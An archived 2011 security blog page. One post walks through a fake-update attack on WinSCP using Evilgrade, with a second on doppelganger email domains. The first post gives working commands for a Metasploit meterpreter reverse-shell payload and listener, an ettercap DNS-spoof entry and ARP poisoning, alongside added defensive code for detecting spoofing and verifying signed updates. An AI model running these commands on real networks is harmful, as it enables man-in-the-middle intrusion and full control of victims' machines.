Archive for September, 2011

 

Don’t Upgrade Your Software…

Sep 29, 2011 in Security


 Evilgrade:

I finally got some time to play around with Evilgrade. You might be asking what Evilgrade is:

“Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.” -http://www.infobytesec.com/

What does this mean to you? Let's say your software goes looking for an update. Instead of it downloading the correct update, someone man-in-the-middles the connection and sends it a malicious update instead.

Infobytesec created a framework to assist in this type of attack. They state that it covers 60+ applications that allow full exploitation via updates. Some examples are:

– Notepad++ 5.8.2
– Java 1.6.0_22 winxp/win7
– aMSN 0.98.3
– Appleupdate
– Mirc 7.14
– Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
– Dap 9.5.0.3
– Winscp 4.2.9
– AutoIt Script 3.3.6.1
– Clamwin 0.96.0.1
– AppTapp Installer 3.11 (Iphone/Itunes)
– getjar (facebook.com)
– Google Analytics Javascript injection
– Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
– Winamp 5.581

Exploitation:

How does this all work? We are going to use WinSCP as an example, which is a very common file transfer client. My initial setup is two boxes: one is the host that will run the WinSCP software and the other is an attacker host running Backtrack 5.

First, you need to figure out where WinSCP looks for updates once the application is installed. I booted up Wireshark, executed WinSCP, and looked at the output.

Image: Wireshark Output Showing the Host Name

So, from the output we see that WinSCP goes to winscp.net. Nothing too crazy here.

1) On Backtrack 5, I downloaded the newest Metasploit version 5 and installed ettercap.

2) Evilgrade needs a malicious payload to give to the client that is trying to upgrade. We are going to use Metasploit to create this reverse shell. Go into the agent folder in evilgrade (/pentest/exploits/isr-evilgrade/agent) and type:

Code: /opt/framework-4.0.0/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.1.10 LPORT=8081 X > super_update.exe
Image: super_update.exe Reverse Shell

This created a file called super_update.exe that when executed makes a reverse shell back to my host (10.0.1.10).

3) Now that we have our malicious payload, we need to set up a listener so that the reverse shell can connect back to you through Metasploit:

Code: /opt/framework-4.0.0/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=8081 LHOST=0.0.0.0 E
Image: Reverse Shell

4) We know that our host is going to call out to winscp.net when it tries to update, so we need to make sure that it resolves to our attacker box.

Code: echo "winscp.net A 10.0.1.10" >> /usr/local/share/ettercap/etter.dns

This adds an entry to ettercap's etter.dns file, which the dns_spoof plugin reads, so that when anyone asks for winscp.net, we give them our attacker IP (10.0.1.10).

5) Our next step is to ARP poison the host machine so that any DNS request is sent through our attacker box. The easiest way to do this is through ettercap:

Code: ettercap -TqM arp:remote /10.0.1.7/ /10.0.1.1/
Image: Running Ettercap

Once inside ettercap, press the letter “P” and choose “dns_spoof”
Image: DNS Spoof

6) Now we are ready to run evilgrade! ./evilgrade
6a) Run: conf winscp
6b) Run: set agent /pentest/exploits/isr-evilgrade/agent/super_update.exe
6c) Run: start

Image: Running Evilgrade

7) We are all set. Now when the user executes WinSCP and it tries to update, the host will look for winscp.net. Luckily, our man-in-the-middle setup redirects winscp.net to our attacker box (10.0.1.10). Even better, evilgrade sets up a web server to host our agent (reverse shell) file. If you look closely, it updates with version 9.6.6, which is not a valid WinSCP version.

Image: WinSCP tries to Update
Image: Reverse Shell Gets Delivered
Image: Exploited Box!!!

8) And look, Exploitation complete! Full control of our host machine via updates.
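From the defender's side, steps 4 and 5 leave two artifacts: the gateway and the attacker box share one MAC address in the victim's ARP cache, and a public update host resolves to a private address. The Python check below is an added example, not part of the original post; the ARP table, the DNS answer log and the function names are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: `arp -a` style output on the victim while it is poisoned.
ARP_TABLE = """\
  10.0.1.1        00-0c-29-4f-8e-35     dynamic
  10.0.1.10       00-0c-29-4f-8e-35     dynamic
  10.0.1.20       00-0c-29-11-22-33     dynamic
  10.0.1.255      ff-ff-ff-ff-ff-ff     static
  255.255.255.255 ff-ff-ff-ff-ff-ff     static
"""
# Constructed sample: (queried name, answered address) pairs from a DNS log.
DNS_ANSWERS = [("winscp.net", "10.0.1.10"), ("example.org", "93.184.216.34")]
UPDATE_HOSTS = {"winscp.net"}  # public hosts that software fetches updates from

ARP_LINE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\b",
    re.M | re.I)


def shared_macs(arp_text):
    """Return {mac: [ips]} for each unicast MAC claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in ARP_LINE.findall(arp_text):
        mac = mac.lower().replace(":", "-")
        if int(mac[:2], 16) & 1:  # broadcast/multicast MACs are shared by design
            continue
        by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def spoofed_update_answers(answers, update_hosts):
    """Return answers where a public update host resolved to a non-global IP."""
    hits = []
    for name, addr in answers:
        known = name.rstrip(".").lower() in update_hosts
        if known and not ipaddress.ip_address(addr).is_global:
            hits.append((name, addr))
    return hits


if __name__ == "__main__":
    print("IPs sharing a MAC:", shared_macs(ARP_TABLE))
    print("Update hosts answered with local addresses:",
          spoofed_update_answers(DNS_ANSWERS, UPDATE_HOSTS))
```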

Now, why does this work? Because many of these software vendors do not validate updates with a cryptographic key that only that specific vendor holds. Most applications do not try to do any validation, so they become an easy target for exploitation. Go sniff your application updates and make sure that they do some type of authentication/verification before downloading their update. If they don’t, go ask them to!
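What that validation looks like when it is present, as an added example that is not from the original post or from any vendor's updater: the client pins the vendor's public key and refuses any download whose RSA PKCS#1 v1.5 / SHA-256 signature does not verify. The signature scheme, the function names and the demo key (built from two Mersenne primes, insecure, used only so the block runs with the standard library) are assumptions.

```python
import hashlib
import hmac

# DER header of a SHA-256 DigestInfo (RFC 8017, section 9.2).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

# Constructed demo key from two Mersenne primes. Insecure, illustration only.
_P, _Q, E = 2**521 - 1, 2**607 - 1, 65537
N = _P * _Q                              # public modulus pinned in the client
_D = pow(E, -1, (_P - 1) * (_Q - 1))     # private exponent, vendor side only
KEY_BYTES = (N.bit_length() + 7) // 8

def _encode(package: bytes) -> bytes:
    """EMSA-PKCS1-v1_5 encoding of the package's SHA-256 digest."""
    t = SHA256_DIGESTINFO + hashlib.sha256(package).digest()
    return b"\x00\x01" + b"\xff" * (KEY_BYTES - len(t) - 3) + b"\x00" + t

def vendor_sign(package: bytes) -> bytes:
    """Vendor build server: sign the release with the private exponent."""
    m = int.from_bytes(_encode(package), "big")
    return pow(m, _D, N).to_bytes(KEY_BYTES, "big")

def verify_update(package: bytes, signature: bytes) -> bool:
    """Client: accept the download only if the vendor's signature matches."""
    if len(signature) != KEY_BYTES:
        return False
    s = int.from_bytes(signature, "big")
    if s >= N:
        return False
    recovered = pow(s, E, N).to_bytes(KEY_BYTES, "big")
    # Rebuild the expected block and compare it whole (no lenient parsing).
    return hmac.compare_digest(recovered, _encode(package))

def install(package: bytes, signature: bytes) -> str:
    """Refuse to run anything the pinned vendor key did not sign."""
    return "installed" if verify_update(package, signature) else "rejected"

if __name__ == "__main__":
    genuine = b"constructed bytes standing in for the real installer"
    sig = vendor_sign(genuine)
    print(install(genuine, sig))                            # vendor's file
    print(install(b"file served by a spoofed host", sig))   # swapped in transit
```

A production updater would use a vetted crypto library and a properly generated key; the decision logic stays the same.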

Doppelganger Domains

Sep 06, 2011 in Security


Sorry for not being able to update in a while, but I have been spending a lot of time on the Doppelganger Domains project. Check out our final product here: http://godaigroup.net/publications/doppelganger-domains/

Domain typo-squatting is commonly used to spread malware to users who accidentally misspell a legitimate domain in their web browser. A new type of domain typo-squatting takes advantage of an omission instead of a misspelling. A Doppelganger Domain is a domain spelled identically to a legitimate fully qualified domain name (FQDN) but missing the dot between host/subdomain and domain, to be used for malicious purposes. Doppelganger Domains have a potent impact via email as attackers could gather information such as trade secrets, user names and passwords, and other employee information.

Each company in the Fortune 500 was profiled for susceptibility to Doppelganger Domains and 151 companies (or 30%) were found to be susceptible. In large corporations, email usage is extremely high and the likelihood of some email being mis-sent is high, which could result in data leakage.
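The definition above can be turned into a check over outbound mail logs. This added Python example (not taken from the whitepaper) derives the doppelganger form of each of an organisation's FQDNs and flags outbound recipients addressed to one; example.com, the host list, the recipient list and the function names are constructed.

```python
# Constructed sample data; example.com stands in for the organisation's domain.
REGISTERED = "example.com"
FQDNS = ["us.example.com", "mail.example.com", "hr.eu.example.com"]
OUTBOUND = [
    "alice@us.example.com",       # correct
    "bob@usexample.com",          # dot omitted
    "carol@hr.euexample.com",     # dot omitted below a deeper subdomain
    "dave@partner.example.net",   # unrelated
]


def doppelganger_map(registered, fqdns):
    """Map each doppelganger domain to the legitimate name it imitates."""
    suffix = "." + registered
    table = {}
    for fqdn in fqdns:
        fqdn = fqdn.lower().rstrip(".")
        if not fqdn.endswith(suffix):
            continue                      # not one of our hosts (or the apex)
        label = fqdn[:-len(suffix)].split(".")[-1]  # label next to the domain
        table[label + registered] = label + suffix
    return table


def misaddressed(recipients, registered, fqdns):
    """Return (recipient, intended address) for mail sent to a doppelganger."""
    table = doppelganger_map(registered, fqdns)
    hits = []
    for rcpt in recipients:
        local, _, domain = rcpt.rpartition("@")
        domain = domain.lower().rstrip(".")
        for fake, real in table.items():
            if domain == fake or domain.endswith("." + fake):
                intended = domain[:len(domain) - len(fake)] + real
                hits.append((rcpt, f"{local}@{intended}"))
    return hits


if __name__ == "__main__":
    for sent, meant in misaddressed(OUTBOUND, REGISTERED, FQDNS):
        print(f"{sent} was probably meant for {meant}")
```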

Download and read the whitepaper for impact details, vulnerability prevalence, and mitigation strategies. We are also offering a free scan to identify if your domain is vulnerable to the doppelganger domain attack.

http://files.godaigroup.net/doppelganger/Doppelganger.Domains.pdf